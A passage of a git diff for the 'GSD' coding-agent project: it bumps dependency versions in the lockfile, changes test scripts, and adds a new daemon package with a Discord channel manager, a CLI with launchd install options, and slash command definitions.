+      "resolved": "https://registry.npmjs.org/undici/-/undici-6.24.1.tgz",
+      "integrity": "sha512-sC+b0tB1whOCzbtlx20fx3WgCXwkW627p4EA9uM+/tNNPkSS+eSEld6pAs9nDv7WbY1UUljBMYPtu9BCOrCWKA==",
+      "license": "MIT",
+      "engines": {
+        "node": ">=18.17"
+      }
+    },
     "node_modules/dunder-proto": {
       "version": "1.0.1",
       "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz",
@@ -4997,9 +5281,9 @@
       "license": "MIT"
     },
     "node_modules/electron": {
-      "version": "41.0.3",
-      "resolved": "https://registry.npmjs.org/electron/-/electron-41.0.3.tgz",
-      "integrity": "sha512-IDjx8liW1q+r7+MOip5W1Eo1eMwJzVObmYrd9yz2dPCkS7XlgLq3qPVMR80TpiROFp73iY30kTzMdpA6fEVs3A==",
+      "version": "41.2.0",
+      "resolved": "https://registry.npmjs.org/electron/-/electron-41.2.0.tgz",
+      "integrity": "sha512-0OKLiymqfV0WK68RBXqAm3Myad2TpI5wwxLCBEUcH5Nugo3YfSk7p1Js/AL9266qTz5xZioUnxt9hG8FFwax0g==",
       "dev": true,
       "hasInstallScript": true,
       "license": "MIT",
@@ -5419,9 +5703,9 @@
       "license": "BSD-3-Clause"
     },
     "node_modules/fast-xml-builder": {
-      "version": "1.1.2",
-      "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.2.tgz",
-      "integrity": "sha512-NJAmiuVaJEjVa7TjLZKlYd7RqmzOC91EtPFXHvlTcqBVo50Qh7XV5IwvXi1c7NRz2Q/majGX9YLcwJtWgHjtkA==",
+      "version": "1.1.4",
+      "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.4.tgz",
+      "integrity": "sha512-f2jhpN4Eccy0/Uz9csxh3Nu6q4ErKxf0XIsasomfOihuSUa3/xw6w8dnOtCDgEItQFJG8KyXPzQXzcODDrrbOg==",
       "funding": [
         {
           "type": "github",
@@ -5434,9 +5718,9 @@
       }
     },
     "node_modules/fast-xml-parser": {
-      "version": "5.4.1",
-      "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.4.1.tgz",
-      "integrity": "sha512-BQ30U1mKkvXQXXkAGcuyUA/GA26oEB7NzOtsxCDtyu62sjGw5QraKFhx2Em3WQNjPw9PG6MQ9yuIIgkSDfGu5A==",
+      "version": "5.5.8",
+      "resolved": "https://registry.npmjs.org/fast-xml-parser/-/fast-xml-parser-5.5.8.tgz",
+      "integrity": "sha512-Z7Fh2nVQSb2d+poDViM063ix2ZGt9jmY1nWhPfHBOK2Hgnb/OW3P4Et3P/81SEej0J7QbWtJqxO05h8QYfK7LQ==",
       "funding": [
         {
           "type": "github",
@@ -5445,8 +5729,9 @@
       ],
       "license": "MIT",
       "dependencies": {
-        "fast-xml-builder": "^1.0.0",
-        "strnum": "^2.1.2"
+        "fast-xml-builder": "^1.1.4",
+        "path-expression-matcher": "^1.2.0",
+        "strnum": "^2.2.0"
       },
       "bin": {
         "fxparser": "src/cli/cli.js"
@@ -5504,9 +5789,9 @@
       }
     },
     "node_modules/file-type": {
-      "version": "21.3.1",
-      "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.1.tgz",
-      "integrity": "sha512-SrzXX46I/zsRDjTb82eucsGg0ODq2NpGDp4HcsFKApPy8P8vACjpJRDoGGMfEzhFC0ry61ajd7f72J3603anBA==",
+      "version": "21.3.4",
+      "resolved": "https://registry.npmjs.org/file-type/-/file-type-21.3.4.tgz",
+      "integrity": "sha512-Ievi/yy8DS3ygGvT47PjSfdFoX+2isQueoYP1cntFW1JLYAuS4GD7NUPGg4zv2iZfV52uDyk5w5Z0TdpRS6Q1g==",
       "license": "MIT",
       "dependencies": {
         "@tokenizer/inflate": "^0.4.1",
@@ -5978,9 +6263,9 @@
       }
     },
     "node_modules/hono": {
-      "version": "4.12.8",
-      "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.8.tgz",
-      "integrity": "sha512-VJCEvtrezO1IAR+kqEYnxUOoStaQPGrCmX3j4wDTNOcD1uRPFpGlwQUIW8niPuvHXaTUxeOUl5MMDGrl+tmO9A==",
+      "version": "4.12.12",
+      "resolved": "https://registry.npmjs.org/hono/-/hono-4.12.12.tgz",
+      "integrity": "sha512-p1JfQMKaceuCbpJKAPKVqyqviZdS0eUxH9v82oWo1kb9xjQ5wA6iP3FNVAPDFlz5/p7d45lO+BpSk1tuSZMF4Q==",
       "license": "MIT",
       "engines": {
         "node": ">=16.9.0"
@@ -6638,6 +6923,18 @@
         "url": "https://github.com/sponsors/sindresorhus"
       }
     },
+    "node_modules/lodash": {
+      "version": "4.18.1",
+      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz",
+      "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==",
+      "license": "MIT"
+    },
+    "node_modules/lodash.snakecase": {
+      "version": "4.1.1",
+      "resolved": "https://registry.npmjs.org/lodash.snakecase/-/lodash.snakecase-4.1.1.tgz",
+      "integrity": "sha512-QZ1d4xoBHYUeuouhEq3lk3Uq7ldgyFXGBhg04+oRLnIz8o9T65Eh+8YdroUwn846zchkA9yDsDl5CVVaV2nqYw==",
+      "license": "MIT"
+    },
     "node_modules/long": {
       "version": "5.3.2",
       "resolved": "https://registry.npmjs.org/long/-/long-5.3.2.tgz",
@@ -6663,6 +6960,12 @@
         "node": "20 || >=22"
       }
     },
+    "node_modules/magic-bytes.js": {
+      "version": "1.13.0",
+      "resolved": "https://registry.npmjs.org/magic-bytes.js/-/magic-bytes.js-1.13.0.tgz",
+      "integrity": "sha512-afO2mnxW7GDTXMm5/AoN1WuOcdoKhtgXjIvHmobqTD1grNplhGdv3PFOyjCVmrnOZBIT/gD/koDKpYG+0mvHcg==",
+      "license": "MIT"
+    },
     "node_modules/magic-string": {
       "version": "0.30.21",
       "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz",
@@ -7087,9 +7390,9 @@
       }
     },
     "node_modules/path-expression-matcher": {
-      "version": "1.1.3",
-      "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.1.3.tgz",
-      "integrity": "sha512-qdVgY8KXmVdJZRSS1JdEPOKPdTiEK/pi0RkcT2sw1RhXxohdujUlJFPuS1TSkevZ9vzd3ZlL7ULl1MHGTApKzQ==",
+      "version": "1.4.0",
+      "resolved": "https://registry.npmjs.org/path-expression-matcher/-/path-expression-matcher-1.4.0.tgz",
+      "integrity": "sha512-s4DQMxIdhj3jLFWd9LxHOplj4p9yQ4ffMGowFf3cpEgrrJjEhN0V5nxw4Ye1EViAGDoL4/1AeO6qHpqYPOzE4Q==",
       "funding": [
         {
           "type": "github",
@@ -7127,9 +7430,9 @@
       }
     },
     "node_modules/path-to-regexp": {
-      "version": "8.3.0",
-      "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.3.0.tgz",
-      "integrity": "sha512-7jdwVIRtsP8MYpdXSwOS0YdD0Du+qOoF/AEPIt88PcCFrZCzx41oxku1jD88hZBwbNUIEfpqvuhjFaMAqMTWnA==",
+      "version": "8.4.2",
+      "resolved": "https://registry.npmjs.org/path-to-regexp/-/path-to-regexp-8.4.2.tgz",
+      "integrity": "sha512-qRcuIdP69NPm4qbACK+aDogI5CBDMi1jKe0ry5rSQJz8JVLsC7jV8XpiJjGRLLol3N+R5ihGYcrPLTno6pAdBA==",
       "license": "MIT",
       "funding": {
         "type": "opencollective",
@@ -7149,9 +7452,9 @@
       "license": "ISC"
     },
     "node_modules/picomatch": {
-      "version": "4.0.3",
-      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.3.tgz",
-      "integrity": "sha512-5gTmgEY/sqK6gFXLIsQNH19lWb4ebPDLA4SdLP7dsWkIXHWlG66oPuVvXSGFPppYZz8ZDZq0dYYrbHfBCVUb1Q==",
+      "version": "4.0.4",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz",
+      "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
       "license": "MIT",
       "engines": {
         "node": ">=12"
@@ -7999,9 +8302,9 @@
       }
     },
     "node_modules/strnum": {
-      "version": "2.2.0",
-      "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.0.tgz",
-      "integrity": "sha512-Y7Bj8XyJxnPAORMZj/xltsfo55uOiyHcU2tnAVzHUnSJR/KsEX+9RoDeXEnsXtl/CX4fAcrt64gZ13aGaWPeBg==",
+      "version": "2.2.3",
+      "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz",
+      "integrity": "sha512-oKx6RUCuHfT3oyVjtnrmn19H1SiCqgJSg+54XqURKp5aCMbrXrhLjRN9TjuwMjiYstZ0MzDrHqkGZ5dFTKd+zg==",
       "funding": [
         {
           "type": "github",
@@ -8139,6 +8442,12 @@
       "integrity": "sha512-FPAhNPFMrkwz76P7cdjdmiShwMynZYN6SgOujD1urY4oNm80Ou9oMdmbR45LotcKOXoy7wSmHkRFE6Mxbrhefw==",
       "license": "MIT"
     },
+    "node_modules/ts-mixer": {
+      "version": "6.0.4",
+      "resolved": "https://registry.npmjs.org/ts-mixer/-/ts-mixer-6.0.4.tgz",
+      "integrity": "sha512-ufKpbmrugz5Aou4wcr5Wc1UUFWOLhq+Fm6qa6P0w0K5Qw2yhaUoiWszhCVuNQyNwrlGiscHOmqYoAox1PtvgjA==",
+      "license": "MIT"
+    },
     "node_modules/tslib": {
       "version": "2.8.1",
       "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz",
@@ -8295,9 +8604,9 @@
       }
     },
     "node_modules/vite": {
-      "version": "7.3.1",
-      "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.1.tgz",
-      "integrity": "sha512-w+N7Hifpc3gRjZ63vYBXA56dvvRlNWRczTdmCBBa+CotUzAPf5b7YMdMR/8CQoeYE5LX3W4wj6RYTgonm1b9DA==",
+      "version": "7.3.2",
+      "resolved": "https://registry.npmjs.org/vite/-/vite-7.3.2.tgz",
+      "integrity": "sha512-Bby3NOsna2jsjfLVOHKes8sGwgl4TT0E6vvpYgnAYDIF/tie7MRaFthmKuHx1NSXjiTueXH3do80FMQgvEktRg==",
       "dev": true,
       "license": "MIT",
       "peer": true,
@@ -8991,9 +9300,9 @@
       "license": "ISC"
     },
     "node_modules/yaml": {
-      "version": "2.8.2",
-      "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.2.tgz",
-      "integrity": "sha512-mplynKqc1C2hTVYxd0PU2xQAc22TI1vShAYGksCCfxbn/dFwnHTNi1bvYsBTkhdUNtGIf5xNOg938rrSSYvS9A==",
+      "version": "2.8.3",
+      "resolved": "https://registry.npmjs.org/yaml/-/yaml-2.8.3.tgz",
+      "integrity": "sha512-AvbaCLOO2Otw/lW5bmh9d/WEdcDFdQp2Z2ZUH3pX9U2ihyUY0nvLv7J6TrWowklRGPYbB/IuIMfYgxaCPg5Bpg==",
       "license": "ISC",
       "bin": {
         "yaml": "bin.mjs"
@@ -9116,6 +9425,66 @@
         }
       }
     },
+    "packages/daemon": {
+      "name": "@gsd-build/daemon",
+      "version": "0.1.0",
+      "license": "MIT",
+      "dependencies": {
+        "@anthropic-ai/sdk": "^0.52.0",
+        "@gsd-build/rpc-client": "^2.52.0",
+        "discord.js": "^14.25.1",
+        "yaml": "^2.8.0",
+        "zod": "^3.24.0"
+      },
+      "bin": {
+        "gsd-daemon": "dist/cli.js"
+      },
+      "devDependencies": {
+        "@types/node": "^24.12.0",
+        "typescript": "^5.4.0"
+      },
+      "engines": {
+        "node": ">=22.0.0"
+      }
+    },
+    "packages/daemon/node_modules/@anthropic-ai/sdk": {
+      "version": "0.52.0",
+      "resolved": "https://registry.npmjs.org/@anthropic-ai/sdk/-/sdk-0.52.0.tgz",
+      "integrity": "sha512-d4c+fg+xy9e46c8+YnrrgIQR45CZlAi7PwdzIfDXDM6ACxEZli1/fxhURsq30ZpMZy6LvSkr41jGq5aF5TD7rQ==",
+      "license": "MIT",
+      "bin": {
+        "anthropic-ai-sdk": "bin/cli"
+      }
+    },
+    "packages/daemon/node_modules/zod": {
+      "version": "3.25.76",
+      "resolved": "https://registry.npmjs.org/zod/-/zod-3.25.76.tgz",
+      "integrity": "sha512-gzUt/qt81nXsFGKIFcC3YnfEAx5NkunCfnDlvuBSSFS02bcXu4Lmea0AFIUwbLWxWPx3d9p8S5QoaujKcNQxcQ==",
+      "license": "MIT",
+      "funding": {
+        "url": "https://github.com/sponsors/colinhacks"
+      }
+    },
+    "packages/mcp-server": {
+      "name": "@gsd-build/mcp-server",
+      "version": "2.52.0",
+      "license": "MIT",
+      "dependencies": {
+        "@gsd-build/rpc-client": "^2.52.0",
+        "@modelcontextprotocol/sdk": "^1.27.1",
+        "zod": "^4.0.0"
+      },
+      "bin": {
+        "gsd-mcp-server": "dist/cli.js"
+      },
+      "devDependencies": {
+        "@types/node": "^24.12.0",
+        "typescript": "^5.4.0"
+      },
+      "engines": {
+        "node": ">=22.0.0"
+      }
+    },
     "packages/native": {
       "name": "@gsd/native",
       "version": "0.1.0",
@@ -9166,7 +9535,7 @@
     },
     "packages/pi-coding-agent": {
       "name": "@gsd/pi-coding-agent",
-      "version": "2.40.0",
+      "version": "2.66.1",
       "dependencies": {
         "@mariozechner/jiti": "^2.6.2",
         "@silvia-odwyer/photon-node": "^0.3.4",
@@ -9208,6 +9577,14 @@
         "koffi": "^2.9.0"
       }
     },
+    "packages/rpc-client": {
+      "name": "@gsd-build/rpc-client",
+      "version": "2.52.0",
+      "license": "MIT",
+      "engines": {
+        "node": ">=22.0.0"
+      }
+    },
     "studio": {
       "name": "@gsd/studio",
       "version": "0.0.0",
diff --git a/package.json b/package.json
index 2ff80fd7a..949928fb7 100644
--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "gsd-pi",
-  "version": "2.41.0",
+  "version": "2.67.0",
   "description": "GSD — Get Shit Done coding agent",
   "license": "MIT",
   "repository": {
@@ -53,10 +53,13 @@
     "copy-resources": "node scripts/copy-resources.cjs",
     "copy-themes": "node scripts/copy-themes.cjs",
     "copy-export-html": "node scripts/copy-export-html.cjs",
-    "test:unit": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts",
+    "test:compile": "node scripts/compile-tests.mjs",
+    "test:unit": "npm run test:compile && node --import ./scripts/dist-test-resolve.mjs --experimental-test-isolation=process --test-reporter=./scripts/test-reporter-compact.mjs --test 'dist-test/src/tests/*.test.js' 'dist-test/src/resources/extensions/gsd/tests/*.test.js' 'dist-test/src/resources/extensions/gsd/tests/*.test.mjs' 'dist-test/src/resources/extensions/shared/tests/*.test.js' 'dist-test/src/resources/extensions/claude-code-cli/tests/*.test.js' 'dist-test/src/resources/extensions/github-sync/tests/*.test.js' 'dist-test/src/resources/extensions/universal-config/tests/*.test.js' 'dist-test/src/resources/extensions/voice/tests/*.test.js' 'dist-test/src/resources/extensions/mcp-client/tests/*.test.js'",
+    "test:packages": "node --test packages/pi-coding-agent/dist/core/*.test.js",
     "test:marketplace": "GSD_TEST_CLONE_MARKETPLACES=1 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/claude-import-tui.test.ts src/resources/extensions/gsd/tests/plugin-importer-live.test.ts src/tests/marketplace-discovery.test.ts",
-    "test:coverage": "c8 --reporter=text --reporter=lcov --exclude='src/resources/extensions/gsd/tests/**' --exclude='src/tests/**' --exclude='scripts/**' --exclude='native/**' --exclude='node_modules/**' --check-coverage --statements=50 --lines=50 --branches=20 --functions=20 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts",
-    "test:integration": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test src/resources/extensions/gsd/tests/*integration*.test.ts src/tests/integration/*.test.ts",
+    "test:coverage": "c8 --reporter=text --reporter=lcov --exclude='src/resources/extensions/gsd/tests/**' --exclude='src/tests/**' --exclude='scripts/**' --exclude='native/**' --exclude='node_modules/**' --check-coverage --statements=40 --lines=40 --branches=20 --functions=20 node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --experimental-test-isolation=process --test src/resources/extensions/gsd/tests/*.test.ts src/resources/extensions/gsd/tests/*.test.mjs src/tests/*.test.ts src/resources/extensions/shared/tests/*.test.ts",
+    "test:integration": "node --import ./src/resources/extensions/gsd/tests/resolve-ts.mjs --experimental-strip-types --test 'src/tests/integration/*.test.ts' 'src/resources/extensions/gsd/tests/integration/*.test.ts' 'src/resources/extensions/async-jobs/*.test.ts' 'src/resources/extensions/browser-tools/tests/*.test.mjs'",
+    "pretest": "npm run typecheck:extensions",
     "test": "npm run test:unit && npm run test:integration",
     "test:smoke": "node --experimental-strip-types tests/smoke/run.ts",
     "test:fixtures": "node --experimental-strip-types tests/fixtures/run.ts",
@@ -134,10 +137,12 @@
     "@types/node": "^24.12.0",
     "@types/picomatch": "^4.0.2",
     "c8": "^11.0.0",
+    "esbuild": "^0.25.12",
     "jiti": "^2.6.1",
     "typescript": "^5.4.0"
   },
   "optionalDependencies": {
+    "@anthropic-ai/claude-agent-sdk": "^0.2.83",
     "@gsd-build/engine-darwin-arm64": ">=2.10.2",
     "@gsd-build/engine-darwin-x64": ">=2.10.2",
     "@gsd-build/engine-linux-arm64-gnu": ">=2.10.2",
diff --git a/packages/daemon/package.json b/packages/daemon/package.json
new file mode 100644
index 000000000..74060981f
--- /dev/null
+++ b/packages/daemon/package.json
@@ -0,0 +1,48 @@
+{
+  "name": "@gsd-build/daemon",
+  "version": "0.1.0",
+  "description": "GSD daemon — background process for project monitoring and Discord integration",
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/gsd-build/gsd-2.git",
+    "directory": "packages/daemon"
+  },
+  "publishConfig": {
+    "access": "public"
+  },
+  "type": "module",
+  "main": "./dist/index.js",
+  "types": "./dist/index.d.ts",
+  "exports": {
+    ".": {
+      "types": "./dist/index.d.ts",
+      "import": "./dist/index.js"
+    }
+  },
+  "bin": {
+    "gsd-daemon": "./dist/cli.js"
+  },
+  "scripts": {
+    "build": "tsc",
+    "test": "node --test dist/daemon.test.js"
+  },
+  "dependencies": {
+    "@anthropic-ai/sdk": "^0.52.0",
+    "@gsd-build/rpc-client": "^2.52.0",
+    "discord.js": "^14.25.1",
+    "yaml": "^2.8.0",
+    "zod": "^3.24.0"
+  },
+  "devDependencies": {
+    "@types/node": "^24.12.0",
+    "typescript": "^5.4.0"
+  },
+  "engines": {
+    "node": ">=22.0.0"
+  },
+  "files": [
+    "dist",
+    "!dist/**/*.test.*"
+  ]
+}
diff --git a/packages/daemon/src/channel-manager.ts b/packages/daemon/src/channel-manager.ts
new file mode 100644
index 000000000..b0ae1604c
--- /dev/null
+++ b/packages/daemon/src/channel-manager.ts
@@ -0,0 +1,223 @@
+/**
+ * ChannelManager — manages per-project Discord text channels under a
+ * 'GSD Projects' category, with archive support.
+ *
+ * Pure helper `sanitizeChannelName` exported separately for testability.
+ */
+
+import {
+  ChannelType,
+  PermissionFlagsBits,
+  type Guild,
+  type CategoryChannel,
+  type TextChannel,
+  type GuildBasedChannel,
+} from 'discord.js';
+import type { Logger } from './logger.js';
+
+// ---------------------------------------------------------------------------
+// Constants
+// ---------------------------------------------------------------------------
+
+const DEFAULT_CATEGORY_NAME = 'GSD Projects';
+const ARCHIVE_CATEGORY_NAME = 'GSD Archive';
+const CHANNEL_PREFIX = 'gsd-';
+const MAX_CHANNEL_NAME_LENGTH = 100; // Discord's limit
+
+// ---------------------------------------------------------------------------
+// Pure helpers — exported for testability
+// ---------------------------------------------------------------------------
+
+/**
+ * Sanitize a project directory path into a valid Discord channel name.
+ *
+ * - Takes the basename of the path
+ * - Lowercases
+ * - Replaces non-alphanumeric (except hyphens) with hyphens
+ * - Collapses consecutive hyphens
+ * - Trims leading/trailing hyphens
+ * - Prefixes with 'gsd-'
+ * - Caps total length at 100 chars (Discord limit)
+ *
+ * Returns 'gsd-unnamed' for empty/whitespace-only inputs.
+ */
+export function sanitizeChannelName(projectDir: string): string {
+  // Extract basename — handle both forward and back slashes
+  const parts = projectDir.replace(/\\/g, '/').split('/');
+  let basename = parts[parts.length - 1] ?? '';
+
+  // Trim whitespace
+  basename = basename.trim();
+
+  // Fallback for empty basename
+  if (!basename) {
+    return 'gsd-unnamed';
+  }
+
+  // Lowercase
+  let name = basename.toLowerCase();
+
+  // Replace non-alphanumeric (except hyphens) with hyphens
+  name = name.replace(/[^a-z0-9-]/g, '-');
+
+  // Collapse consecutive hyphens
+  name = name.replace(/-{2,}/g, '-');
+
+  // Trim leading/trailing hyphens
+  name = name.replace(/^-+|-+$/g, '');
+
+  // Fallback if nothing remains after sanitization
+  if (!name) {
+    return 'gsd-unnamed';
+  }
+
+  // Prefix
+  const prefixed = `${CHANNEL_PREFIX}${name}`;
+
+  // Cap at max length
+  if (prefixed.length > MAX_CHANNEL_NAME_LENGTH) {
+    // Truncate and remove any trailing hyphen from the cut
+    return prefixed.slice(0, MAX_CHANNEL_NAME_LENGTH).replace(/-+$/, '');
+  }
+
+  return prefixed;
+}
+
+// ---------------------------------------------------------------------------
+// ChannelManager class
+// ---------------------------------------------------------------------------
+
+export interface ChannelManagerOptions {
+  guild: Guild;
+  logger: Logger;
+  categoryName?: string;
+}
+
+export class ChannelManager {
+  private readonly guild: Guild;
+  private readonly logger: Logger;
+  private readonly categoryName: string;
+
+  private categoryCache: CategoryChannel | null = null;
+  private archiveCategoryCache: CategoryChannel | null = null;
+
+  constructor(opts: ChannelManagerOptions) {
+    this.guild = opts.guild;
+    this.logger = opts.logger;
+    this.categoryName = opts.categoryName ?? DEFAULT_CATEGORY_NAME;
+  }
+
+  /**
+   * Find or create the project category channel.
+   * Caches the result — subsequent calls return the cached category.
+   */
+  async resolveCategory(): Promise<CategoryChannel> {
+    if (this.categoryCache) {
+      return this.categoryCache;
+    }
+
+    const existing = this.findCategoryByName(this.categoryName);
+    if (existing) {
+      this.categoryCache = existing;
+      this.logger.debug('category resolved from cache', { name: this.categoryName, id: existing.id });
+      return existing;
+    }
+
+    // Create the category
+    const created = await this.guild.channels.create({
+      name: this.categoryName,
+      type: ChannelType.GuildCategory,
+    });
+
+    this.categoryCache = created as CategoryChannel;
+    this.logger.info('category created', { name: this.categoryName, id: created.id });
+    return this.categoryCache;
+  }
+
+  /**
+   * Create a text channel for a project under the GSD Projects category.
+   * Channel name is derived from the project directory path.
+   */
+  async createProjectChannel(projectDir: string): Promise<TextChannel> {
+    const name = sanitizeChannelName(projectDir);
+    const category = await this.resolveCategory();
+
+    const channel = await this.guild.channels.create({
+      name,
+      type: ChannelType.GuildText,
+      parent: category.id,
+    });
+
+    this.logger.info('project channel created', {
+      name,
+      channelId: channel.id,
+      categoryId: category.id,
+      projectDir,
+    });
+
+    return channel as TextChannel;
+  }
+
+  /**
+   * Archive a channel by moving it to the 'GSD Archive' category and
+   * setting permission overwrite to deny ViewChannel for @everyone.
+   */
+  async archiveChannel(channelId: string): Promise<void> {
+    const archive = await this.resolveArchiveCategory();
+
+    const channel = this.guild.channels.cache.get(channelId);
+    if (!channel) {
+      this.logger.warn('archive target not found', { channelId });
+      return;
+    }
+
+    if (!('edit' in channel) || typeof channel.edit !== 'function') {
+      this.logger.warn('archive target is not editable', { channelId, type: channel.type });
+      return;
+    }
+
+    await channel.edit({
+      parent: archive.id,
+      permissionOverwrites: [
+        {
+          id: this.guild.id, // @everyone role ID matches guild ID
+          deny: [PermissionFlagsBits.ViewChannel],
+        },
+      ],
+    });
+
+    this.logger.info('channel archived', { channelId, archiveCategoryId: archive.id });
+  }
+
+  // ---------------------------------------------------------------------------
+  // Private helpers
+  // ---------------------------------------------------------------------------
+
+  private findCategoryByName(name: string): CategoryChannel | null {
+    const match = this.guild.channels.cache.find(
+      (ch: GuildBasedChannel) => ch.type === ChannelType.GuildCategory && ch.name === name,
+    );
+    return (match as CategoryChannel) ?? null;
+  }
+
+  private async resolveArchiveCategory(): Promise<CategoryChannel> {
+    if (this.archiveCategoryCache) {
+      return this.archiveCategoryCache;
+    }
+
+    const existing = this.findCategoryByName(ARCHIVE_CATEGORY_NAME);
+    if (existing) {
+      this.archiveCategoryCache = existing;
+      return existing;
+    }
+
+    const created = await this.guild.channels.create({
+      name: ARCHIVE_CATEGORY_NAME,
+      type: ChannelType.GuildCategory,
+    });
+
+    this.archiveCategoryCache = created as CategoryChannel;
+    this.logger.info('archive category created', { name: ARCHIVE_CATEGORY_NAME, id: created.id });
+    return this.archiveCategoryCache;
+  }
+}
diff --git a/packages/daemon/src/cli.ts b/packages/daemon/src/cli.ts
new file mode 100644
index 000000000..5449ad761
--- /dev/null
+++ b/packages/daemon/src/cli.ts
@@ -0,0 +1,96 @@
+#!/usr/bin/env node
+import { parseArgs } from 'node:util';
+import { fileURLToPath } from 'node:url';
+import { resolve, dirname } from 'node:path';
+import { resolveConfigPath, loadConfig } from './config.js';
+import { Logger } from './logger.js';
+import { Daemon } from './daemon.js';
+import { install, uninstall, status } from './launchd.js';
+
+const USAGE = `Usage: gsd-daemon [options]
+
+Options:
+  --config <path>  Path to YAML config file (default: ~/.gsd/daemon.yaml)
+  --verbose        Print log entries to stderr in addition to the log file
+  --install        Install the launchd LaunchAgent (auto-starts on login)
+  --uninstall      Uninstall the launchd LaunchAgent
+  --status         Show launchd agent status (registered, PID, exit code)
+  --help           Show this help message and exit
+`;
+
+async function main(): Promise<void> {
+  const { values } = parseArgs({
+    options: {
+      config: { type: 'string', short: 'c' },
+      verbose: { type: 'boolean', short: 'v', default: false },
+      install: { type: 'boolean', default: false },
+      uninstall: { type: 'boolean', default: false },
+      status: { type: 'boolean', default: false },
+      help: { type: 'boolean', short: 'h', default: false },
+    },
+    strict: true,
+  });
+
+  if (values.help) {
+    process.stdout.write(USAGE);
+    process.exit(0);
+  }
+
+  // --- launchd commands (dispatch before Daemon creation) ---
+
+  if (values.install) {
+    const configPath = resolveConfigPath(values.config);
+    const thisFile = fileURLToPath(import.meta.url);
+    const scriptPath = resolve(dirname(thisFile), 'cli.js');
+
+    install({
+      nodePath: process.execPath,
+      scriptPath,
+      configPath,
+    });
+    process.stdout.write('gsd-daemon: launchd agent installed and loaded.\n');
+    process.exit(0);
+  }
+
+  if (values.uninstall) {
+    uninstall();
+    process.stdout.write('gsd-daemon: launchd agent uninstalled.\n');
+    process.exit(0);
+  }
+
+  if (values.status) {
+    const result = status();
+    if (!result.registered) {
+      process.stdout.write('gsd-daemon: not registered with launchd.\n');
+    } else if (result.pid != null) {
+      process.stdout.write(
+        `gsd-daemon: running (PID ${result.pid}, last exit status: ${result.lastExitStatus ?? 'n/a'})\n`,
+      );
+    } else {
+      process.stdout.write(
+        `gsd-daemon: registered but not running (last exit status: ${result.lastExitStatus ?? 'n/a'})\n`,
+      );
+    }
+    process.exit(0);
+  }
+
+  // --- normal daemon start ---
+
+  const configPath = resolveConfigPath(values.config);
+  const config = loadConfig(configPath);
+
+  const logger = new Logger({
+    filePath: config.log.file,
+    level: config.log.level,
+    verbose: values.verbose,
+  });
+
+  const daemon = new Daemon(config, logger);
+  await daemon.start();
+}
+
+main().catch((err: unknown) => {
+  const msg = err instanceof Error ? err.message : String(err);
+  process.stderr.write(`gsd-daemon: fatal: ${msg}\n`);
+  process.exit(1);
+});
diff --git a/packages/daemon/src/commands.ts b/packages/daemon/src/commands.ts
new file mode 100644
index 000000000..d46d92269
--- /dev/null
+++ b/packages/daemon/src/commands.ts
@@ -0,0 +1,110 @@
+/**
+ * Slash command definitions, guild-scoped registration, and status formatting.
+ *
+ * Commands are registered per-guild (not globally) for instant availability.
+ * Registration failures are non-fatal — the bot continues without slash commands.
+ */
+
+import {
+  SlashCommandBuilder,
+  REST,
+  Routes,
+  type RESTPostAPIChatInputApplicationCommandsJSONBody,
+} from 'discord.js';
+import type { ManagedSession } from './types.js';
+import type { Logger } from './logger.js';
+
+// ---------------------------------------------------------------------------
+// Command definitions
+// ---------------------------------------------------------------------------
+
+/**
+ * Build the array of slash command JSON payloads for guild registration.
+ */
+export function buildCommands(): RESTPostAPIChatInputApplicationCommandsJSONBody[] {
+  return [
+    new SlashCommandBuilder()
+      .setName('gsd-status')
+      .setDescription('Show status of all active GSD sessions')
+      .toJSON(),
+    new SlashCommandBuilder()
+      .setName('gsd-start')
+      .setDescription('Start a new GSD session')
+      .toJSON(),
+    new SlashCommandBuilder()
+      .setName('gsd-stop')
+      .setDescription('Stop a running GSD session')
+      .toJSON(),
+    new SlashCommandBuilder()
+      .setName('gsd-verbose')
+      .setDescription('Set event verbosity level for this channel')
+      .addStringOption((option) =>
+        option
+          .setName('level')
+          .setDescription('Verbosity level')
+          .setRequired(false)
+          .addChoices(
+            { name: 'default', value: 'default' },
+            { name: 'verbose', value: 'verbose' },
+            { name: 'quiet', value: 'quiet' },
+          ),
+      )
+      .toJSON(),
+  ];
+}
+
+// ---------------------------------------------------------------------------
+// Guild-scoped registration
+// ---------------------------------------------------------------------------
+
+/**
+ * Register slash commands for a specific guild via PUT.
+ * Non-fatal: logs errors and returns false on failure.
